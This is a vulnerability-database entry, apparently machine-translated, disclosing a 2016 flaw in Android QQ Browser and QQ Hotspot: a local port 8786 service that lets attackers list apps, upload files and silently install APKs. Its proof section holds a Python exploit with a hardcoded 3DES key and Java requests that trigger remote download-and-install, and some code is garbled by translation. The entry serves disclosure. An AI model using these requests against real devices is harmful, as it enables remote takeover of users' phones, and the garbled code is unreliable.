Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:92441
HistorySep 27, 2016 - 12:00 a.m.

QQ browser Wormable Browser vulnerability

2016-09-2700:00:00
Root
www.seebug.org
28
JSON

Source link: http://blog.pangu.io/wormable-browser/

Vulnerability description

Android QQ browser, QQ hot spots and other applications on the local wifi started, it will monitor local 8786 port, and listens to all local ip addresses. When the attacking party and the attacked party is on the same LAN environment, through the interface, can be in the LAN run QQ browser, QQ hot spots in the device to upload data, to start the application installation. When these applications have root permissions, you can the silent installation of mobile applications. The attacker and the attacked party is in a different local area network environment, through a malicious link, the remote of the implant, infection and The is the attacker is located within the LAN all running the Android version of the QQ browser, QQ hot spots, etc. applications of the host.

Vulnerability details

Discovery process: By Janus platform search found that, QQ browser locally on services.

Application in the Get to connected in the handle method for processing.

By the bind command, you can connect to verify. And then use other commands, such as downloadandinstall remote control.

Vulnerability proof

1, the remote access to the installed applications list. ``

!/ usr/bin/env Python 2

-- coding: utf-8 --

import requests import base64 from binascii import b2a_hex, a2b_hex from pyDes import *

payload = “”

x_uuid = “d661d51862c23e397d14cb0eb2bf46f4” key = “kM7hYp8lE69UjidhlPbD98Pm”

def encode_(s): e_scheme = triple_des(key, ECB, “\0\0\0\0\0\0\0\0”, pad = None, padmode = PAD_PKCS5) r = e_scheme. encrypt(s) return base64. b64encode®

def decode_(s): b = base64. b64decode(s) e_scheme = triple_des(key, ECB, “\0\0\0\0\0\0\0\0”, pad = None, padmode = PAD_PKCS5) return e_scheme. the decrypt(b)

def req(payload): headers = { ‘Content-Length’:str(len(payload)), ‘Content-Type’:‘application/x-www-form-urlencoded’, ‘Host’:‘127.0.0.1’, ‘Connection’:‘close’, ‘Accept-Encoding’:‘gzip’} try: r = requests. post(“http://192.168.31.160:8786/bind?uuid=” + x_uuid, data=payload, headers=headers) r = requests. get(“http://192.168.31.160:8786/getapplist?uuid=” + x_uuid)
except: print “Error”

print r. status_code
print r. content
if r != ":
 print decode_(r. content)
print r. headers

if name == “main”: stage1 = encode_(“{‘code’:‘123456’,‘uuid’:” + x_uuid + “}”) stage2 = encode_(stage1)

req(stage2)

`` 2, Remote download, install the application.

String apkdetail="{'pkgName':'com. wandoujia. phoenix2'," + "'url':'http://a.wdjcdn.com/release/files/phoenix/5.19.1.12038/wandoujia-wandoujia-web_direct_binded_5.19.1.12038.apk'," + "'name':'wandoujia-wandoujia-web_direct_binded_5. 19. 1. 12038. apk'," + "'fileMd5':'3808dbc7092e18ec9e375d54b027162f'," + "'autoOpen':'true'," + "'installBySys':'false'," //+ "'fileFolderPath':"," + "'forbidRename':'true','length':'6492397','mimeType':'application/x-www-form-urlencoded','hasToast':'true'," + "'hasChooserDlg':'true'}"; String data=b(apkdetail,f_u); data=b(data,f_u); resp=(doPost("http://192.168.31.156:8786/downloadandinstall?uuid="+uuid, data)); 3, other such as uploading files, etc. can be performed.

String fileContent=Util. readFileByLines("D:\\迅雷下载\\w.apk"); resp=(doPost("http://192.168.31.155:8786/bind?uuid="+uuid, ecStep2)); resp=(doPost("http://192.168.31.155:8786/upload? uuid="+uuid+"&len=6492397&start=0&time=0&name=w. apk&type=apk&fileMd5=3808dbc7092e18ec9e375d54b027162f&installBySys=true",fileContent));

Solution

Combine this two application scenarios found in the authentication aspect and there is not much repair space these two applications by 2 times the 3DES encryption to exchange the uuid of the third party access for authentication. Therefore, we recommend that developers in the third party access, to the user necessary interactive prompt warning, to ensure that authorized users only can call the relevant interface, from the process of this problem to fix it. By the dawn of the Janus platform search found that two Tencent apps affected by this vulnerability. Are QQ browser and QQ hotspot.

Which QQ browser of the relatively large impact, the test found to include the latest version of the many versions are affected by this vulnerability.

Vulnerability discovery

Zhao Shuai, Pangu laboratory researcher

BU Vinci, Pangu laboratory internship researcher

JSON